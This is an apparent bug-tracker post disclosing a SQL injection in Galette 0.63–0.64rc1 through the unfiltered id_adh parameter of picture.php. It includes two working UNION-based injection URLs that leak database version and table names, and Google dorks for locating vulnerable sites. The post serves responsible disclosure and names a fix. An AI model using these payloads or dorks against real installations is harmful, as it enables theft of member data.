Anomalie #250
Updated by Johan Cwiklinski over 12 years ago
Hi developers, I've discovered a SQL injection in Galette software on 0.63 branch version and it's seems not fixed regarding the ChangeLog here [1]. The advisory below: h2. Affected versions It seems only versions listed here are vulnerable : * 0.63 * 0.63.1 * 0.63.2 * 0.63.3 * 0.64rc1 h2. Vulnerability The vulnerability is located in file *includes/picture.class.php* at L.71-73 (cf. [2]) <pre lang="php"> ... $sql = "SELECT picture,format FROM ".PREFIX_DB."pictures WHERE id_adh=".$id_adh; ... </pre> $id_adh is an input controlled by the user in file *picture.php* and *not* filtered at line L.35-36 (cf. [3]) : <pre lang="php"> ... else $id_adh = $_GET['id_adh']; ... </pre> h2. Exploitation The queries below allow to inject SQL injection to create a data leak in order to retrieve datas on database and server configuration on a Galette fresh installation - Leak MySQL Version <pre> /picture.php?id_adh=0+and+1=0+union+select+@@version,null </pre> - Leak tables name on a MySQL 5.x (group_concat is limiting output here) <pre> /picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables </pre> I don't want to show too many exploitable queries to avoid the usage by kiddies but it's possible to inject hard queries in order to leak adherents datas. h2. Impact of the vulnerablity Galette is a well known adherent web interface used by lots of associations (specially French one), it's possible to look for vulnerable targets using the Google dorks below: * inurl:self_adherent.php intitle:"Galette v0.63" * inurl:self_adherent.php intitle:Galette The impact is to create database data leaks exposure on any vulnerable Galette installation. h2. Mitigation of the vulnerability Update to 0.7.x version h2. Discovered by Sofian Brabez <sbz@nbs-system.com> h2. Timeline * 09/05/2012: Contact vendor through bug tracker on redmine.ulysses.fr readmine.ulysses.fr h2. References [1] http://galette.tuxfamily.org//documentation/fr/changelog.html [2] http://svn.gna.org/viewcvs/galette/branches/galette-0-63-bugfix/galette/includes/picture.class.php?revision=826&view=markup http://git.tuxfamily.org/galette/galette?p=galette/galette.git;a=blob;f=includes/picture.class.php;h=9c4985eeb37369c9b64af6e11e6840645474fb2c;hb=7b4b477b0349f00c7555cbd66870ff6f22831faf#l70 [3] http://svn.gna.org/viewcvs/galette/branches/galette-0-63-bugfix/galette/picture.php?revision=825&view=markup http://git.tuxfamily.org/galette/galette?p=galette/galette.git;a=blob;f=picture.php;h=8ec80ab9f67b66f2fced141d9512332cf64f334e;hb=7b4b477b0349f00c7555cbd66870ff6f22831faf#l35